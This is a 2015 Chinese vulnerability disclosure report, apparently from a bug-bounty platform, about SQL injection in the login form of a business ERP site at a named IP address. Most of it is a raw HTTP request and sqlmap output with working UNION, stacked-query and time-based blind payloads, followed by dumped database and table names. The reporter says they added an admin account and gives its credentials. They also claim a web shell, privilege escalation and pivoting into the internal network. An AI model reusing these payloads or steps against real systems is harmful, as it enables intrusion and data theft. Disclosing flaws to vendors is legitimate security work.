2015-08-03: 细节已通知厂商并且等待厂商处理中 2015-08-04: 厂商已经确认,细节仅向厂商公开 2015-08-14: 细节向核心白帽子及相关领域专家公开 2015-08-24: 细节向普通白帽子公开 2015-09-03: 细节向实习白帽子公开 2015-09-18: 细节向公众公开
- -
http://221.237.153.40:8081/和华润控股合作的首先后台存在注入
POST /Login.aspx HTTP/1.1Host: 221.237.153.40:8081Proxy-Connection: keep-aliveContent-Length: 217Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://221.237.153.40:8081User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://221.237.153.40:8081/Login.aspxAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8__VIEWSTATE=%2FwEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi%2FtiZA6rA%3D%3D&__EVENTVALIDATION=%2FwEWBALMvPzODgLB2tiHDgKd%2B7qdDgKM54rGBswXH3t03%2BJD6BSESsrbFW2r6QCY&txtUser=11111&txtPwd=1111111&Button1=%E7%99%BB%E5%BD%95
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:---Place: POSTParameter: txtUser Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtUser Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录---available databases [11]:[*] ceshi[*] master[*] model[*] msdb[*] qdxt_xl[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] xuehua_2014[*] xuehua_2015[*] ZDFY_275sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtUser Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录---Database: xuehua_2015[95 tables]+-------------------------+| dbo.ERP_user || dbo.LC || dbo.LCCD || dbo.LCID || dbo.LC_detail || dbo.LC_roll || dbo.Lxsb_cpmx || dbo.Lxsb_fymx || dbo.Lxsb_gdfy || dbo.Lxsb_sxyjmx || dbo.Table_1 || dbo.View_Jtchongxiao_ls || dbo.View_Sum_jhfy || dbo.View_Sum_jhfy_new || dbo.View_Sum_sjfy || dbo.View_Sum_sjxl || dbo.View_Sum_sxyj || dbo.View_Sum_sxyj_yd || dbo.View_Sum_ydxl || dbo.View_XL_Dc || dbo.View_cwsj || dbo.View_fy || dbo.View_fy_jxs || dbo.View_fy_zfy || dbo.View_fyjt || dbo.View_hxlc || dbo.View_hxpg || dbo.View_jtcx || dbo.View_lx_qr_db || dbo.View_lxsb_jd || dbo.View_sp || dbo.View_sxyj || dbo.View_sxyj_new || dbo.View_tzmx || dbo.View_tzmx_new || dbo.View_tzmx_newxybh || dbo.View_xl || dbo.View_xl_new || dbo.View_xsjk || dbo.View_xsjk_hj || dbo.View_xsjk_init || dbo.View_ydsb || dbo.XH_bz || dbo.XH_cp || dbo.XH_cpdc || dbo.XH_dxy_qsy || dbo.XH_fygs || dbo.XH_fygs_ewcp || dbo.XH_fygs_ewsxyj || dbo.XH_fygs_fybd || dbo.XH_fygs_gdsxyj || dbo.XH_fygs_sxyj || dbo.XH_fygsmx || dbo.XH_fyhx || dbo.XH_fykm || dbo.XH_fysp || dbo.XH_fytk || dbo.XH_gc || dbo.XH_gdcb || dbo.XH_gdfy || dbo.XH_gdfylb || dbo.XH_glqy || dbo.XH_gtfy || dbo.XH_hxpg || dbo.XH_jgtx || dbo.XH_jgtx_ls || dbo.XH_jhfy || dbo.XH_jtls || dbo.XH_lxsb || dbo.XH_lxsbsh || dbo.XH_mk || dbo.XH_pfs || dbo.XH_qyzt || dbo.XH_sjfy || dbo.XH_sjxl || dbo.XH_sxyj || dbo.XH_sxyj_yd || dbo.XH_trxs || dbo.XH_user || dbo.XH_user_dq || dbo.XH_user_qx || dbo.XH_user_qy || dbo.XH_xsdq || dbo.XH_xsjk || dbo.XH_xsjk_kj || dbo.XH_xyyq || dbo.XH_xzqy || dbo.XH_ydxl || dbo.XH_yyt || dbo.XH_zd || dbo.XH_zdgk || dbo.XH_zdlx || dbo.XH_zm || dbo.dljl || dbo.qdxtidtzmx |+-------------------------+dbo.XH_user 表里有几千个经销商和包括admin的密码 我登入admin添加了一个账号作为测试为了方便审核 jianfen/jianfen97
后台功能
getshell :
web.configsa权限提权成功
reduh转发入内网
过滤注入
危害等级:高
漏洞Rank:20
确认时间:2015-08-04 17:59
感谢提交
暂无